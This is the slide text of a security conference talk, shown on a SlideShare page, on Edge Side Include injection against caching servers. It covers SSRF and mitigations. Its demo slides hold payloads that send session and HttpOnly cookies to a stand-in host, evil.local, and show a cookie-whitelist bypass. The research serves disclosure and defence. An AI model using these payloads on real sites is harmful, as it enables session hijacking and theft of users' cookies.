SlideShare a Scribd company logo

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Priyanka Aash
Priyanka Aash

When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks. The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking. Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.

Technology
1 of 50
Download to read offline
Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
ESI — Brief Overview
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
ESI — Include Network Flow (Cache MISS)
ESI — Include Network Flow (Cache MISS) ①/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
SSRF with Apache Traffic Server
ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure

Recommended

H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hackXchym Hiệp
 
PostgreSQL, performance for queries with grouping
PostgreSQL, performance for queries with groupingPostgreSQL, performance for queries with grouping
PostgreSQL, performance for queries with groupingAlexey Bashtanov
 
Jvm tuning for low latency application & Cassandra
Jvm tuning for low latency application & CassandraJvm tuning for low latency application & Cassandra
Jvm tuning for low latency application & CassandraQuentin Ambard
 
CQRS and Event Sourcing for Java Developers
CQRS and Event Sourcing for Java DevelopersCQRS and Event Sourcing for Java Developers
CQRS and Event Sourcing for Java DevelopersMarkus Eisele
 
Regular Expression
Regular ExpressionRegular Expression
Regular ExpressionMahzad Zahedi
 
Cpu Cache and Memory Ordering——并发程序设计入门
Cpu Cache and Memory Ordering——并发程序设计入门Cpu Cache and Memory Ordering——并发程序设计入门
Cpu Cache and Memory Ordering——并发程序设计入门frogd
 
Linux Performance Tools
Linux Performance ToolsLinux Performance Tools
Linux Performance ToolsBrendan Gregg
 
Scaling Asterisk with Kamailio
Scaling Asterisk with KamailioScaling Asterisk with Kamailio
Scaling Asterisk with KamailioFred Posner
 

Recommended

H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hackXchym Hiệp
 
PostgreSQL, performance for queries with grouping
PostgreSQL, performance for queries with groupingPostgreSQL, performance for queries with grouping
PostgreSQL, performance for queries with groupingAlexey Bashtanov
 
Jvm tuning for low latency application & Cassandra
Jvm tuning for low latency application & CassandraJvm tuning for low latency application & Cassandra
Jvm tuning for low latency application & CassandraQuentin Ambard
 
CQRS and Event Sourcing for Java Developers
CQRS and Event Sourcing for Java DevelopersCQRS and Event Sourcing for Java Developers
CQRS and Event Sourcing for Java DevelopersMarkus Eisele
 
Regular Expression
Regular ExpressionRegular Expression
Regular ExpressionMahzad Zahedi
 
Cpu Cache and Memory Ordering——并发程序设计入门
Cpu Cache and Memory Ordering——并发程序设计入门Cpu Cache and Memory Ordering——并发程序设计入门
Cpu Cache and Memory Ordering——并发程序设计入门frogd
 
Linux Performance Tools
Linux Performance ToolsLinux Performance Tools
Linux Performance ToolsBrendan Gregg
 
Scaling Asterisk with Kamailio
Scaling Asterisk with KamailioScaling Asterisk with Kamailio
Scaling Asterisk with KamailioFred Posner
 
Developing and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDWDeveloping and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDWJonathan Katz
 
Rate limits and all about
Rate limits and all aboutRate limits and all about
Rate limits and all aboutAlexander Tokarev
 
Using galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wanUsing galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wanSakari Keskitalo
 
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]Antonios Katsarakis
 
Python (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationPython (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationRick Sherman
 
Architecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin SimeArchitecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin SimeAlan Quayle
 
Redis data modeling examples
Redis data modeling examplesRedis data modeling examples
Redis data modeling examplesTerry Cho
 
Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2Chandresh Pancholi
 
하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조Logpresso
 
Kubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy AgentKubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy AgentCloudOps2005
 
Demystfying container-networking
Demystfying container-networkingDemystfying container-networking
Demystfying container-networkingBalasundaram Natarajan
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101SUSE Labs Taipei
 
Understanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and RaftUnderstanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and RaftHitoshi Mitake
 
Spark on Kubernetes
Spark on KubernetesSpark on Kubernetes
Spark on Kubernetesdatamantra
 
用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務Bo-Yi Wu
 
Rest and the hypermedia constraint
Rest and the hypermedia constraintRest and the hypermedia constraint
Rest and the hypermedia constraintInviqa
 
ACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easyACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easyGabriell Nascimento
 
Cisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integrationCisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integrationArunKumar Subbiah
 
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具Shengyou Fan
 
Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Alexey Lesovsky
 
Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 

More Related Content

What's hot

Developing and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDWDeveloping and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDWJonathan Katz
 
Using galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wanUsing galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wanSakari Keskitalo
 
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]Antonios Katsarakis
 
Python (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationPython (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationRick Sherman
 
Architecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin SimeArchitecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin SimeAlan Quayle
 
Redis data modeling examples
Redis data modeling examplesRedis data modeling examples
Redis data modeling examplesTerry Cho
 
Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2Chandresh Pancholi
 
하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조Logpresso
 
Kubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy AgentKubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy AgentCloudOps2005
 
Understanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and RaftUnderstanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and RaftHitoshi Mitake
 
Spark on Kubernetes
Spark on KubernetesSpark on Kubernetes
Spark on Kubernetesdatamantra
 
用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務Bo-Yi Wu
 
Rest and the hypermedia constraint
Rest and the hypermedia constraintRest and the hypermedia constraint
Rest and the hypermedia constraintInviqa
 
ACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easyACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easyGabriell Nascimento
 
Cisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integrationCisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integrationArunKumar Subbiah
 
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具Shengyou Fan
 
Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Alexey Lesovsky
 

What's hot (20)

Developing and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDWDeveloping and Deploying Apps with the Postgres FDW
Developing and Deploying Apps with the Postgres FDW
 
Rate limits and all about
Rate limits and all aboutRate limits and all about
Rate limits and all about
 
Using galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wanUsing galera replication to create geo distributed clusters on the wan
Using galera replication to create geo distributed clusters on the wan
 
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
Zeus: Locality-aware Distributed Transactions [Eurosys '21 presentation]
 
Python (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationPython (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network Automation
 
Architecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin SimeArchitecting your WebRTC application for scalability, Arin Sime
Architecting your WebRTC application for scalability, Arin Sime
 
Redis data modeling examples
Redis data modeling examplesRedis data modeling examples
Redis data modeling examples
 
Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2Distributed tracing using open tracing &amp; jaeger 2
Distributed tracing using open tracing &amp; jaeger 2
 
하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조하이퍼레저 패브릭 데이터 구조
하이퍼레저 패브릭 데이터 구조
 
Kubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy AgentKubernetes Security with Calico and Open Policy Agent
Kubernetes Security with Calico and Open Policy Agent
 
Demystfying container-networking
Demystfying container-networkingDemystfying container-networking
Demystfying container-networking
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
Understanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and RaftUnderstanding performance aspects of etcd and Raft
Understanding performance aspects of etcd and Raft
 
Spark on Kubernetes
Spark on KubernetesSpark on Kubernetes
Spark on Kubernetes
 
用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務用 Go 語言實戰 Push Notification 服務
用 Go 語言實戰 Push Notification 服務
 
Rest and the hypermedia constraint
Rest and the hypermedia constraintRest and the hypermedia constraint
Rest and the hypermedia constraint
 
ACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easyACME and Let's Encrypt: HTTPS made easy
ACME and Let's Encrypt: HTTPS made easy
 
Cisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integrationCisco ise jun os and ios xr - tacacs+ integration
Cisco ise jun os and ios xr - tacacs+ integration
 
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
[COSCUP 2022] 讓黑畫面再次偉大 - 用 PHP 寫 CLI 工具
 
Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it allCriciúma Dev
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowDerek Willian Stavis
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryTatsuhiko Miyagawa
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)Igor Bronovskyy
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable WebTimothy Perrett
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?Remy Sharp
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasyJBug Italy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.jsFDConf
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 

Similar to Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking (20)

Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it all
 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to now
 
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQueryRemedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
Remedie: Building a desktop app with HTTP::Engine, SQLite and jQuery
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Nodejs.meetup
Nodejs.meetupNodejs.meetup
Nodejs.meetup
 
RESTEasy
RESTEasyRESTEasy
RESTEasy
 
Scalalable Language for a Scalable Web
Scalalable Language for a Scalable WebScalalable Language for a Scalable Web
Scalalable Language for a Scalable Web
 
HTML5: huh, what is it good for?
HTML5: huh, what is it good for?HTML5: huh, what is it good for?
HTML5: huh, what is it good for?
 
How Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing SimplerHow Akamai Made ESI Testing Simpler
How Akamai Made ESI Testing Simpler
 
May 2010 - RestEasy
May 2010 - RestEasyMay 2010 - RestEasy
May 2010 - RestEasy
 
Writing RESTful web services using Node.js
Writing RESTful web services using Node.jsWriting RESTful web services using Node.js
Writing RESTful web services using Node.js
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Intro to PSGI and Plack
Intro to PSGI and PlackIntro to PSGI and Plack
Intro to PSGI and Plack
 
Webpack
Webpack Webpack
Webpack
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
